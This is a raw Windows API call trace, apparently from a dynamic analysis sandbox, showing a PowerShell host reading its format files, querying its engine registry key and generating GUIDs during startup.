	[0523.993] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed100 | out: lpFileInformation=0x1ed100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0523.993] SetErrorMode (uMode=0x1) returned 0x1
	[0523.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0523.993] SetErrorMode (uMode=0x1) returned 0x1
	[0523.993] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed100 | out: lpFileInformation=0x1ed100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0523.993] SetErrorMode (uMode=0x1) returned 0x1
	[0523.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0523.994] SetErrorMode (uMode=0x1) returned 0x1
	[0523.994] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed100 | out: lpFileInformation=0x1ed100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0523.994] SetErrorMode (uMode=0x1) returned 0x1
	[0523.995] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0523.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0523.995] CoTaskMemFree (pv=0x1b6e48b0) 
	[0524.008] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0524.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0524.008] CoTaskMemFree (pv=0x1b6e48b0) 
	[0524.010] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0524.010] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0524.010] CoTaskMemFree (pv=0x1b6e48b0) 
	[0524.012] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0524.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0524.012] CoTaskMemFree (pv=0x1b6e48b0) 
	[0524.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0524.013] SetErrorMode (uMode=0x1) returned 0x1
	[0524.013] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0524.013] GetFileType (hFile=0x300) returned 0x1
	[0524.014] SetErrorMode (uMode=0x1) returned 0x1
	[0524.014] GetFileType (hFile=0x300) returned 0x1
	[0524.014] ReadFile (in: hFile=0x300, lpBuffer=0x336a130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x336a130*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.016] ReadFile (in: hFile=0x300, lpBuffer=0x336a130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x336a130*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.016] ReadFile (in: hFile=0x300, lpBuffer=0x336a130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x336a130*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.017] ReadFile (in: hFile=0x300, lpBuffer=0x336a130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x336a130*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.017] ReadFile (in: hFile=0x300, lpBuffer=0x336a130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x336a130*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.017] ReadFile (in: hFile=0x300, lpBuffer=0x336a130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x336a130*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.018] ReadFile (in: hFile=0x300, lpBuffer=0x336a130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x336a130*, lpNumberOfBytesRead=0x1ecd98*=0x9e2, lpOverlapped=0x0) returned 1
	[0524.018] ReadFile (in: hFile=0x300, lpBuffer=0x336967a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x336967a*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0524.018] ReadFile (in: hFile=0x300, lpBuffer=0x336a130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x336a130*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0524.018] CloseHandle (hObject=0x300) returned 1
	[0524.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0524.018] SetErrorMode (uMode=0x1) returned 0x1
	[0524.018] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0524.018] SetErrorMode (uMode=0x1) returned 0x1
	[0524.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0524.019] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x300) returned 0x0
	[0524.019] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0524.019] CoTaskMemAlloc (cb=0x5a) returned 0x1b6e7160
	[0524.019] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x1b6e7160, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0524.019] CoTaskMemFree (pv=0x1b6e7160) 
	[0524.019] RegCloseKey (hKey=0x300) returned 0x0
	[0524.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0524.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0524.026] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x35682b11, Data2=0x6660, Data3=0x4114, Data4=([0]=0x82, [1]=0x48, [2]=0x5a, [3]=0x28, [4]=0x51, [5]=0xe, [6]=0xdf, [7]=0xae))) returned 0x0
	[0524.030] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x350bbb90, Data2=0x9d00, Data3=0x498f, Data4=([0]=0x85, [1]=0xb1, [2]=0xeb, [3]=0x2f, [4]=0x37, [5]=0xca, [6]=0x4e, [7]=0xc9))) returned 0x0
	[0524.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0524.032] SetErrorMode (uMode=0x1) returned 0x1
	[0524.032] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0524.033] GetFileType (hFile=0x300) returned 0x1
	[0524.033] SetErrorMode (uMode=0x1) returned 0x1
	[0524.033] GetFileType (hFile=0x300) returned 0x1
	[0524.033] ReadFile (in: hFile=0x300, lpBuffer=0x3394c98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3394c98*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.034] ReadFile (in: hFile=0x300, lpBuffer=0x3394c98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3394c98*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.035] ReadFile (in: hFile=0x300, lpBuffer=0x3394c98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3394c98*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.035] ReadFile (in: hFile=0x300, lpBuffer=0x3394c98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3394c98*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.035] ReadFile (in: hFile=0x300, lpBuffer=0x3394c98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3394c98*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.037] ReadFile (in: hFile=0x300, lpBuffer=0x3394c98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3394c98*, lpNumberOfBytesRead=0x1ecd98*=0xfb2, lpOverlapped=0x0) returned 1
	[0524.037] ReadFile (in: hFile=0x300, lpBuffer=0x33943b2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33943b2*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0524.037] ReadFile (in: hFile=0x300, lpBuffer=0x3394c98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3394c98*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0524.037] CloseHandle (hObject=0x300) returned 1
	[0524.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0524.037] SetErrorMode (uMode=0x1) returned 0x1
	[0524.038] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0524.038] SetErrorMode (uMode=0x1) returned 0x1
	[0524.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0524.038] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x300) returned 0x0
	[0524.038] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0524.038] CoTaskMemAlloc (cb=0x5a) returned 0x1b6e7160
	[0524.038] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x1b6e7160, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0524.038] CoTaskMemFree (pv=0x1b6e7160) 
	[0524.039] RegCloseKey (hKey=0x300) returned 0x0
	[0524.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0524.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0524.961] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xcbdeb56a, Data2=0x3532, Data3=0x4777, Data4=([0]=0xad, [1]=0x32, [2]=0xea, [3]=0x7a, [4]=0x4c, [5]=0x8f, [6]=0x6, [7]=0x89))) returned 0x0
	[0524.966] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xc83f19d3, Data2=0x82f3, Data3=0x4b48, Data4=([0]=0x95, [1]=0x70, [2]=0x63, [3]=0xab, [4]=0xbd, [5]=0xcb, [6]=0xad, [7]=0xde))) returned 0x0
	[0524.967] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xd5d05d1a, Data2=0x36a7, Data3=0x4b55, Data4=([0]=0xa9, [1]=0xf1, [2]=0x11, [3]=0xce, [4]=0x21, [5]=0xbd, [6]=0x93, [7]=0x9a))) returned 0x0
	[0524.968] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x6da73388, Data2=0xb9f7, Data3=0x4333, Data4=([0]=0x87, [1]=0xe9, [2]=0x55, [3]=0xda, [4]=0xc6, [5]=0x2d, [6]=0x4d, [7]=0xbd))) returned 0x0
	[0524.969] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa550e834, Data2=0xbc60, Data3=0x4280, Data4=([0]=0xb3, [1]=0xc4, [2]=0xd1, [3]=0xae, [4]=0x58, [5]=0xe6, [6]=0x8, [7]=0xe6))) returned 0x0
	[0524.969] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x7b4bbc49, Data2=0xccad, Data3=0x4d91, Data4=([0]=0x8d, [1]=0xde, [2]=0x33, [3]=0xb5, [4]=0xe7, [5]=0xff, [6]=0xf5, [7]=0x21))) returned 0x0
	[0524.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0524.970] SetErrorMode (uMode=0x1) returned 0x1
	[0524.970] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0524.971] GetFileType (hFile=0x300) returned 0x1
	[0524.971] SetErrorMode (uMode=0x1) returned 0x1
	[0524.971] GetFileType (hFile=0x300) returned 0x1
	[0524.971] ReadFile (in: hFile=0x300, lpBuffer=0x33e09f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33e09f8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.972] ReadFile (in: hFile=0x300, lpBuffer=0x33e09f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33e09f8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.973] ReadFile (in: hFile=0x300, lpBuffer=0x33e09f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33e09f8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.973] ReadFile (in: hFile=0x300, lpBuffer=0x33e09f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33e09f8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.974] ReadFile (in: hFile=0x300, lpBuffer=0x33e09f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33e09f8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.974] ReadFile (in: hFile=0x300, lpBuffer=0x33e09f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33e09f8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0524.974] ReadFile (in: hFile=0x300, lpBuffer=0x33e09f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33e09f8*, lpNumberOfBytesRead=0x1ecd98*=0xaca, lpOverlapped=0x0) returned 1
	[0524.974] ReadFile (in: hFile=0x300, lpBuffer=0x33e002a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33e002a*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0524.974] ReadFile (in: hFile=0x300, lpBuffer=0x33e09f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x33e09f8*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0524.974] CloseHandle (hObject=0x300) returned 1
	[0524.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0524.975] SetErrorMode (uMode=0x1) returned 0x1
	[0524.975] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0524.975] SetErrorMode (uMode=0x1) returned 0x1
	[0524.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0524.975] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x300) returned 0x0
	[0524.975] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0524.976] CoTaskMemAlloc (cb=0x5a) returned 0x1b6e7160
	[0524.976] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x1b6e7160, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0524.976] CoTaskMemFree (pv=0x1b6e7160) 
	[0524.976] RegCloseKey (hKey=0x300) returned 0x0
	[0524.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0524.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0524.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0524.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0526.849] VirtualQuery (in: lpAddress=0x1eb8c0, lpBuffer=0x1ec780, dwLength=0x30 | out: lpBuffer=0x1ec780*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0526.849] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x2e363393, Data2=0x842, Data3=0x4a88, Data4=([0]=0x8b, [1]=0x72, [2]=0xf4, [3]=0xcb, [4]=0xfb, [5]=0x94, [6]=0x77, [7]=0xe7))) returned 0x0
	[0526.850] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa9b0baf9, Data2=0x41c0, Data3=0x4c7e, Data4=([0]=0xb2, [1]=0x48, [2]=0xdc, [3]=0xd9, [4]=0xb6, [5]=0x8, [6]=0xde, [7]=0xab))) returned 0x0
